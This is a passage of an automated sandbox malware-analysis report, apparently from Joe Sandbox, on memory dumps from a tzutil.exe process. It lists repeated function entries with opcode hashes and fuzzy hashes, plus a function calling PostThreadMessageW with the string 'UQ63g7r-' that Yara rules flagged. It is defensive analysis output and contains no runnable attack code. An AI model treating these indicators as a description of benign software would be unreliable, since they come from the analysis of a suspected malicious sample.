                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8ad301c2942a33e74f30970e772d0486250f730067e03d7f999f0c2206e926f4
                                                          • Instruction ID: d531a6c645ee9ddf896cca218a591ac5bc38755c04d79677286294b50c0b9e96
                                                          • Opcode Fuzzy Hash: 8ad301c2942a33e74f30970e772d0486250f730067e03d7f999f0c2206e926f4
                                                          • Instruction Fuzzy Hash: 989002A1A4150042414171594804407600597E17013A5C219E0554560C861989559269
                                                          Function 02CB2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 7e4451688822e3fb94db0305b4dd916bf73a5e5c4e7b3314531482a0e2e3482a
                                                          • Instruction ID: bfcd5c25c3a6330655263fb852330607e6d9088d1ca1c8ea134507c7ebf50893
                                                          • Opcode Fuzzy Hash: 7e4451688822e3fb94db0305b4dd916bf73a5e5c4e7b3314531482a0e2e3482a
                                                          • Instruction Fuzzy Hash: 04900475751400030107F55D07045070047C7D5751375C135F1015550CD733CD715131
                                                          Function 02CB2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d77df1f889ed43529527072a1c7705e59b68e3f46268b1bff126c774e6f57551
                                                          • Instruction ID: 03ac49662806cff92b3b77a67ab9a005bffbbc29df4ce27556285aa5be57741d
                                                          • Opcode Fuzzy Hash: d77df1f889ed43529527072a1c7705e59b68e3f46268b1bff126c774e6f57551
                                                          • Instruction Fuzzy Hash: 2E900265661400020146B559060450B044597D67513A5C119F1416590CC62289655321
                                                          Function 02CB2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 221f36dfcee51cec2545f3d4083a6e3371f87cf049d1238855a7b5d3316dbf3a
                                                          • Instruction ID: 656c696c85b3dd34dcdfc81548b4f2b4e053d9a6f3ad84157b08479931b12b08
                                                          • Opcode Fuzzy Hash: 221f36dfcee51cec2545f3d4083a6e3371f87cf049d1238855a7b5d3316dbf3a
                                                          • Instruction Fuzzy Hash: 2A90027164544842D14171594404A47001587D0705F65C115E0064694D96268E55B661
                                                          Function 02CB2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d0c786a5e6ead8ccc9e588e5bba3977c900c5c7744cb97e3781745e6c4247b03
                                                          • Instruction ID: 79ee64beb49ee413914651333aaa5a2f55c189b402de04c4441f4b2d5b86ef76
                                                          • Opcode Fuzzy Hash: d0c786a5e6ead8ccc9e588e5bba3977c900c5c7744cb97e3781745e6c4247b03
                                                          • Instruction Fuzzy Hash: A490027164140802D1817159440464B000587D1701FA5C119E0025654DCA168B5977A1
                                                          Function 02CB2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 152ee627a46d7870fcf586bf5641244aa19ffc93b2fe3d2de8af337343a4119d
                                                          • Instruction ID: e421f2b4156104d55efa019ce7f53147842c003f5c7ef61a2eaa13b01cc4d878
                                                          • Opcode Fuzzy Hash: 152ee627a46d7870fcf586bf5641244aa19ffc93b2fe3d2de8af337343a4119d
                                                          • Instruction Fuzzy Hash: F1900271A4540802D15171594414747000587D0701F65C115E0024654D87568B5576A1
                                                          Function 02CB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e1faaaef170845ee595acf67aa329c85a959c23794293931edd39f03d4afa8e6
                                                          • Instruction ID: 2a185b1ad13688ca244e98b677aaa8ff9897a5cb5d2b46b51485f5ad23cc389a
                                                          • Opcode Fuzzy Hash: e1faaaef170845ee595acf67aa329c85a959c23794293931edd39f03d4afa8e6
                                                          • Instruction Fuzzy Hash: 4F9002A164240003410671594414617400A87E0601B65C125E1014590DC52689916125
                                                          Function 02CB2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: cca974f96901e1b8b0a3507dc2e150c424dbf06aa8fbfc36f571d7fc681ea970
                                                          • Instruction ID: c0d1331d198114f3bcdd54ee0b95ae12f668e0aec7deadc7105a24dbfd3bfd52
                                                          • Opcode Fuzzy Hash: cca974f96901e1b8b0a3507dc2e150c424dbf06aa8fbfc36f571d7fc681ea970
                                                          • Instruction Fuzzy Hash: 419002A164180403D14175594804607000587D0702F65C115E2064555E8A2A8D516135
                                                          Function 02CB2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9ae138747f6fbc54b79d24bfd558a946171b88b9242b888368916aafcb1e547c
                                                          • Instruction ID: e9f3c3b4a8762ea526b1b94b954e33ec5243a253a16f1a9729acf32fd500f33f
                                                          • Opcode Fuzzy Hash: 9ae138747f6fbc54b79d24bfd558a946171b88b9242b888368916aafcb1e547c
                                                          • Instruction Fuzzy Hash: D2900261A4140502D10271594404617000A87D0641FA5C126E1024555ECA268A92A131
                                                          Function 02CB2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 0e12a452d4b7ddd9249a6216292f9ad044e0c7d2d4eb23856f5f512503eb2b39
                                                          • Instruction ID: 2e4afc7458ec8685004cc6bba5d43a06ec3fa845a82b592cb9d00bc11e58de46
                                                          • Opcode Fuzzy Hash: 0e12a452d4b7ddd9249a6216292f9ad044e0c7d2d4eb23856f5f512503eb2b39
                                                          • Instruction Fuzzy Hash: BA900261651C0042D20175694C14B07000587D0703F65C219E0154554CC91689615521
                                                          Function 02CB2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8e802733757ad4d1951877ad5eb714c11e3b06abe7d8e17d6b43ca506115163e
                                                          • Instruction ID: e0ec59f07fcfb6c9fcf6f585329a4746b1d988a38fe77f1d3ad232cb4fd6b135
                                                          • Opcode Fuzzy Hash: 8e802733757ad4d1951877ad5eb714c11e3b06abe7d8e17d6b43ca506115163e
                                                          • Instruction Fuzzy Hash: 1A900261A41400424141716988449074005ABE1611765C225E0998550D855A89655665
                                                          Function 02CB2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 7b1c4f9f880c9245afbd2f5742b643f323dd8336431ae2289e5e352002be7ea7
                                                          • Instruction ID: ea18061cfaee2c2536243a27c1d74c1f81015161bc6355f2de535af572b12cae
                                                          • Opcode Fuzzy Hash: 7b1c4f9f880c9245afbd2f5742b643f323dd8336431ae2289e5e352002be7ea7
                                                          • Instruction Fuzzy Hash: A49002A178140442D10171594414B070005C7E1701F65C119E1064554D861ACD526126
                                                          Function 02CB2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4d6694169c2148b11e17183f9c078e0166e48760353b2f079207569e4f92bc41
                                                          • Instruction ID: b542896f1d2a17f2e973b3966affe5eb85aa35b4ff9bd55c37c2327b047fda0c
                                                          • Opcode Fuzzy Hash: 4d6694169c2148b11e17183f9c078e0166e48760353b2f079207569e4f92bc41
                                                          • Instruction Fuzzy Hash: 2690027164140402D10175995408647000587E0701F65D115E5024555EC66689916131
                                                          Function 02CB2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 41338044036a3ff66efa197040d385ac162a650f5b4838169a6e61f74d2148b2
                                                          • Instruction ID: 154255aec07a6ceec5a3e93f7cb01151f5fddb906a756c09161b20d80fdeaf7c
                                                          • Opcode Fuzzy Hash: 41338044036a3ff66efa197040d385ac162a650f5b4838169a6e61f74d2148b2
                                                          • Instruction Fuzzy Hash: BE90027164140842D10171594404B47000587E0701F65C11AE0124654D8616C9517521
                                                          Function 02CB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 26d0e18e9f5c1c17541064a6d3bca6a299cfd9632dce1066574b80abe5444b0f
                                                          • Instruction ID: 35222b14239c861b6eae1ffa697bd9eb8c5b2b85b04de3f19ee84ff2941c3e94
                                                          • Opcode Fuzzy Hash: 26d0e18e9f5c1c17541064a6d3bca6a299cfd9632dce1066574b80abe5444b0f
                                                          • Instruction Fuzzy Hash: 2890027164148802D1117159840474B000587D0701F69C515E4424658D869689917121
                                                          Function 02CB2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bb9d2b3d76e83fb7248d1189899f3ca6d41089ab38ce91eed8ee676cc062cb6c
                                                          • Instruction ID: c1002a3bd241b9f27610aebbcf006f51afe801e6b8252fdb6555989e0d8137da
                                                          • Opcode Fuzzy Hash: bb9d2b3d76e83fb7248d1189899f3ca6d41089ab38ce91eed8ee676cc062cb6c
                                                          • Instruction Fuzzy Hash: 0F900261682441525546B1594404507400697E06417A5C116E1414950C85279956D621
                                                          Function 02CB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: eab900acb5e664a0fd7d6fe5fe9296a08a3feae0684ee794946e056480fb052f
                                                          • Instruction ID: f7ca889f8b199aef1292107e3071e74193896f6cc346cbeec4fcf35b5b407de6
                                                          • Opcode Fuzzy Hash: eab900acb5e664a0fd7d6fe5fe9296a08a3feae0684ee794946e056480fb052f
                                                          • Instruction Fuzzy Hash: C790027164140413D11271594504707000987D0641FA5C516E0424558D96578A52A121
                                                          Function 02CB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 1072796d4799b2f073c60319be814aae47bfe719bd57af12782c2b8566db076f
                                                          • Instruction ID: bba5baf0e05ba6e452b4f86ca433a71bdc59a46a988fa457ef7d890eb3bc1cf7
                                                          • Opcode Fuzzy Hash: 1072796d4799b2f073c60319be814aae47bfe719bd57af12782c2b8566db076f
                                                          • Instruction Fuzzy Hash: 7790026965340002D1817159540860B000587D1602FA5D519E0015558CC91689695321
                                                          Function 02CB2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e31a0cb2428fa5ccd7a18c42188ac03285197a0b93d4f551991e88affc944ad3
                                                          • Instruction ID: 8f78ff78a45524d66b1d9d5ebbfd6b2e5a633ed12b61048dee57fe816a00118c
                                                          • Opcode Fuzzy Hash: e31a0cb2428fa5ccd7a18c42188ac03285197a0b93d4f551991e88affc944ad3
                                                          • Instruction Fuzzy Hash: 2290047174140003D141715D541C7074005D7F1701F75D115F0414554CDD17CD575333
                                                          Function 02CB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: dfa20a420fddd2d7df128c0d003b7940c582b8d65e4da9bd714ad9df191f07df
                                                          • Instruction ID: 0ed8fe5daeb551b2a642de384d8eadafcb1c655425eb4bb7351ba894633952c4
                                                          • Opcode Fuzzy Hash: dfa20a420fddd2d7df128c0d003b7940c582b8d65e4da9bd714ad9df191f07df
                                                          • Instruction Fuzzy Hash: 7B900271A4550402D10171594514707100587D0601F75C515E0424568D87968A5165A2
                                                          Function 02CB39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 0b33ede956c323ccf8f54cf5d761294ae8e1e871a6fcc31f6ed278f6e8d7e53d
                                                          • Instruction ID: d9a89386fb1b198c6ad3dbfbc86298ae0a74fe5507604b736e8893d6b5fd0de9
                                                          • Opcode Fuzzy Hash: 0b33ede956c323ccf8f54cf5d761294ae8e1e871a6fcc31f6ed278f6e8d7e53d
                                                          • Instruction Fuzzy Hash: 279004717C545103D151715D44047174005F7F0701F75C135F0C145D4DC557CD557331
                                                          Function 001D114D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 429 1d114d-1d1158 430 1d11d8-1d1247 call 1eb890 call 1ec2a0 call 1d4990 call 1c13e0 call 1e2000 429->430 431 1d115a-1d1166 429->431 445 1d1249-1d1258 PostThreadMessageW 430->445 446 1d1267-1d126d 430->446 432 1d1168 431->432 433 1d11c3-1d11d4 431->433 432->433 445->446 447 1d125a-1d1264 445->447 447->446
                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 001D1254
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416
                                                          • Opcode ID: 0ad50afb7131ff32622f72e95fb27a8185b8d4c58e7a834c29b618615f7c36a3
                                                          • Instruction ID: 35a0a4cf9f4a272624b2de07a314b211ef63b58ca5f9bbb58bf6b5648d4e1701
                                                          • Opcode Fuzzy Hash: 0ad50afb7131ff32622f72e95fb27a8185b8d4c58e7a834c29b618615f7c36a3
                                                          • Instruction Fuzzy Hash: 0621F672A0424D7EEB01AE959C82DEFBB7CEF51394F04416AF904AB241D7259E068BE1
                                                          Function 001D11D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 448 1d11d6-1d1247 call 1eb890 call 1ec2a0 call 1d4990 call 1c13e0 call 1e2000 460 1d1249-1d1258 PostThreadMessageW 448->460 461 1d1267-1d126d 448->461 460->461 462 1d125a-1d1264 460->462 462->461
                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 001D1254
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
